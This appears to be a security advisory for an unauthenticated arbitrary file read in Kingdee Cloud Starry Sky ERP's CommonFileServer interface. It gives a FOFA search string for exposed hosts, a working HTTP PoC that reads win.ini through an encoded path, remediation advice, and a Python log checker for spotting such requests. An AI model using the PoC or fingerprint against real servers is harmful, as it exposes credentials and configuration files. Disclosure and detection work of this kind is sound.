0x01 Product Introduction
Kingdee Cloud Starry Sky (Kingdee Yunxingkong) is cloud-based enterprise resource planning (ERP) software that provides enterprises with integrated solutions for financial management, supply chain management and business process management. It targets large and medium-sized enterprises with multiple organizations and multiple profit centers, and offers an open ERP cloud platform for the digital economy built on three characteristics: openness, standardization and social interaction. Its services cover finance, supply chain, intelligent manufacturing, amoeba management, omni-channel marketing, e-commerce, HR and enterprise Internet services, helping enterprises build a new ecosystem of digital marketing and management restructuring and strengthen their digital capabilities.
0x02 Vulnerability Overview
Because the CommonFileServer interface of Kingdee Cloud Starry Sky lacks proper access control, an unauthenticated attacker can use it to read arbitrary files on the server, including database credentials, API keys and configuration files, and thereby obtain sensitive information and system access.
0x03 range of influence
Version 6.x, Version 7.x, Version 8.x (all affected)
0x04 Reproduction Environment
FOFA: app="Kingdee Cloud Starry Sky-Management Center"
0x05 Vulnerability Reproduction
PoC
GET /CommonFileServer/c%3A%2Fwindows%2Fwin.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.79
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Note: the vulnerability is crude and simple. The file path is appended directly after the /CommonFileServer/ path, with special characters URL-encoded, and no authentication is required.
Reading the IIS configuration file:
0x06 Remediation Suggestions
Remove the management center from direct Internet exposure and restrict directory permissions on the server so the web process can only read the files it needs.
Sanitize input: hard-code or consistently decode the file name parameters supplied by users, restrict the permitted file types with a whitelist, and reject any parameter containing path or other malicious characters or null bytes.
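As an added example (not code from the vendor or from the original write-up), the following Python shows the whitelist check described above and applies it to constructed IIS W3C log lines so that past CommonFileServer requests carrying drive letters, path separators, traversal sequences or null bytes can be flagged; the log field layout and the allowed extensions are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample IIS W3C log lines (not taken from the page). Assumed field order:
# date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
SAMPLE_LOG = """\
2024-01-01 10:00:00 10.0.0.5 GET /CommonFileServer/c%3A%2Fwindows%2Fwin.ini - 80 198.51.100.7 200
2024-01-01 10:00:01 10.0.0.5 GET /CommonFileServer/..%2F..%2Fweb.config - 80 198.51.100.7 200
2024-01-01 10:00:02 10.0.0.5 GET /CommonFileServer/report.pdf - 80 203.0.113.9 200
2024-01-01 10:00:03 10.0.0.5 GET /K3Cloud/Html5/Index.aspx - 80 203.0.113.9 200
"""

# A plain file name handed to a download handler should never contain path
# separators, a drive-letter colon, a traversal sequence or a null byte.
FORBIDDEN = re.compile(r'[\\/:\x00]|\.\.')
# Illustrative whitelist of downloadable types (an assumption, not the product's list).
ALLOWED_EXT = {".pdf", ".xlsx", ".docx", ".png"}

def is_safe_filename(name: str) -> bool:
    """Decode consistently (twice, to defeat %252F-style double encoding),
    reject forbidden characters, and accept only whitelisted extensions."""
    decoded = unquote(unquote(name))
    if not decoded or FORBIDDEN.search(decoded):
        return False
    ext = decoded[decoded.rfind('.'):].lower() if '.' in decoded else ''
    return ext in ALLOWED_EXT

def flag_requests(log_text: str) -> list[dict]:
    """Return CommonFileServer GET requests whose file component fails the check."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 9 or parts[3] != 'GET':
            continue
        stem, client, status = parts[4], parts[7], parts[8]
        m = re.match(r'/CommonFileServer/(.+)', stem, re.IGNORECASE)
        if m and not is_safe_filename(m.group(1)):
            hits.append({"client": client, "status": status,
                         "requested": unquote(unquote(m.group(1)))})
    return hits

if __name__ == "__main__":
    for hit in flag_requests(SAMPLE_LOG):
        print(hit)
```

Only the first two constructed lines are flagged; the legitimate report download and the unrelated page pass. A 200 status on a flagged line indicates the read most likely succeeded and the host should be treated as compromised.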